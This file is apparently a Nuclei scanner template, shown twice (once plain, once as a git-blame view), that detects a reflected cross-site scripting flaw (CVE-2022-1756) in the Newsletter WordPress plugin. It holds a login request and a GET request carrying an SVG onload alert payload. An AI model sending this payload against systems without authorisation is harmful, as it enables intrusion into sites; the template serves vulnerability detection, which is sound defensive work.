nuclei-templates/http/cves/2022/CVE-2022-1756.yaml

id: CVE-2022-1756

info:
  name: Newsletter < 7.4.5 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.
  remediation: Fixed in version 7.4.5
  reference:
    - https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1756
    - https://wordpress.org/plugins/newsletter/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1756
    cwe-id: CWE-79
    epss-score: 0.00099
    epss-percentile: 0.40843
    cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: thenewsletterplugin
    product: newsletter
    framework: wordpress
    publicwww-query: "/wp-content/plugins/newsletter/"
  tags: wpscan,cve,cve2022,newsletter,xss,authenticated

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=newsletter_main_index&debug&"><svg/onload=alert(/document.domain/)> HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "newsletter") && contains(body, "><svg/onload=alert(/document.domain/)>")'
        condition: and

# digest: 4a0a0047304502210099d31084488cc89cdc0ee54c4a8d8bd7554d42427f63bf88e6ac886e213e22d202203b349f98a0680aa1a641f0a2fb785244dfad0e5434009fcc919f92c7ed945a72:922c64590222798bb761d5b6d8e72950
Create CVE-2022-1756.yaml 2023-08-17 07:49:11 +00:00			`id: CVE-2022-1756`

			`info:`
minor - update 2023-08-19 08:18:57 +00:00			`name: Newsletter < 7.4.5 - Cross-Site Scripting`
Create CVE-2022-1756.yaml 2023-08-17 07:49:11 +00:00			`author: Harsh`
			`severity: medium`
			`description: \|`
fix template with remediation 2023-08-17 09:12:24 +00:00			`The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: Fixed in version 7.4.5`
Create CVE-2022-1756.yaml 2023-08-17 07:49:11 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-1756`
fix template with remediation 2023-08-17 09:12:24 +00:00			`- https://wordpress.org/plugins/newsletter/`
Create CVE-2022-1756.yaml 2023-08-17 07:49:11 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
			`cve-id: CVE-2022-1756`
			`cwe-id: CWE-79`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-score: 0.00099`
TemplateMan Update [Mon Nov 20 05:10:39 UTC 2023] :robot: 2023-11-20 05:10:39 +00:00			`epss-percentile: 0.40843`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:thenewsletterplugin:newsletter::::::wordpress::*`
Create CVE-2022-1756.yaml 2023-08-17 07:49:11 +00:00			`metadata:`
			`verified: true`
fix template with remediation 2023-08-17 09:12:24 +00:00			`max-request: 2`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`vendor: thenewsletterplugin`
			`product: newsletter`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`framework: wordpress`
			`publicwww-query: "/wp-content/plugins/newsletter/"`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`tags: wpscan,cve,cve2022,newsletter,xss,authenticated`
fix template with remediation 2023-08-17 09:12:24 +00:00
Create CVE-2022-1756.yaml 2023-08-17 07:49:11 +00:00			`http:`
			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`log={{username}}&pwd={{password}}&wp-submit=Log+In`
			`- \|`
			`GET /wp-admin/admin.php?page=newsletter_main_index&debug&"><svg/onload=alert(/document.domain/)> HTTP/1.1`
			`Host: {{Hostname}}`

			`cookie-reuse: true`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'status_code == 200'`
fix template with remediation 2023-08-17 09:12:24 +00:00			`- 'contains(body, "newsletter") && contains(body, "><svg/onload=alert(/document.domain/)>")'`
Create CVE-2022-1756.yaml 2023-08-17 07:49:11 +00:00			`condition: and`
TemplateMan Update [Mon Nov 20 06:35:10 UTC 2023] :robot: 2023-11-20 06:35:10 +00:00
			`# digest: 4a0a0047304502210099d31084488cc89cdc0ee54c4a8d8bd7554d42427f63bf88e6ac886e213e22d202203b349f98a0680aa1a641f0a2fb785244dfad0e5434009fcc919f92c7ed945a72:922c64590222798bb761d5b6d8e72950`